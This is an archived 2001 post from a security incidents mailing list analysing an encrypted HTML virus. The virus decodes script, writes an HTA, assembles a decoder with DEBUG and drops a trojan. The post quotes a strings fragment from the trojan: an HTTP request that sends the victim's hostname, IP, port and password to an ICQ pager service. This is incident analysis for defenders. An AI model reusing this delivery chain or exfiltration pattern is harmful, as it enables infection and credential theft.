Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: encrypted html based virus

From: Dzzie Z <dzzie () YAHOO COM>
Date: Thu, 18 Jan 2001 20:15:31 -0500
 hats off to whoever made this originally :) it is a pretty neat flow of
events here....the whole thing is a master piece...

webpage decodes actual malicious commands, refreshs browser to run pages
new content

browser executes new code and writes hta

on reboot(?) hta goes into effect..(unless somehow that long non ascii
string overflows a buffer..there was a package named godmessage a while
back that worked like this on acouple activx controls...humm wonder)

-the classID in the decoded page maps to:
  "Object for constructing type libraries for scriptlets"
  inprocserver= C:\WINDOWS\SYSTEM\SCROBJ.DLL
  ( anyone know anythign more about this dll? )

so the hta first writes xxdecode.src which looks like assembler commands

runs it though debug to turn it into machinecode (xxdecode.com)

writes an encoded file and decodes it with its own com decoder to create a
live exe...

I am amazed they could squeeze all that functionality into a html scripting
exploit...i wonder why they didnt just disassemble the exe they were after
and run that through debug? does uuencode compress? bet this probably comes
from a wrapped hack program...probably from TLsecurity thinking back to the
title in the decoded web page...going to have to root around and see if I
can find it


the exe looks like a trojan...contacts someone through there icq pager

q.com.GET./scrip
ts/WWPMsg.dll?fr
om=Asylum&fromem
ail=Asylum&subje
ct=%s&body=hey+t
here,+ive+been+c
ommitted...+[nam
e=%s]_[hostname=
%s]_[ip=%s]_[por
t=%s]_[password=
%s]_[version=0.1
.3]_[winver=%s]&
to=%s.HTTP/1.0..
.....abcdefghijk
lmnopqr.36063200
...%s\%s.winpcf3
2.exe.%s\system.
ini.%s\win.ini.e
xplorer.exe.%s.b

wish I had a junk drive to run it on so I could grab the packets :)

thanks for sharing :) techniques like this just expand thought sooo
much...I cant imagine how long it took to develop this...the debug trick is
beautiful...the only other place I have seen that is in an old school bat
file --> com maker....

when I went to check the base href in the original file...it gave me a
crash page...lots of con\con and nul\nul imgs and other scripting tricks...
but I looked into the  server and they are a free web host with cgi
scripting...so probably just a rouge user name "theproxyjudge" over a
comprimised system.
        if this was a overflow of an old activex control buffer it is likly to
have been pre IE5(?) so they might have given me a page to fit to my
browser version...
Previous By Date Next
Previous By Thread Next

Current thread: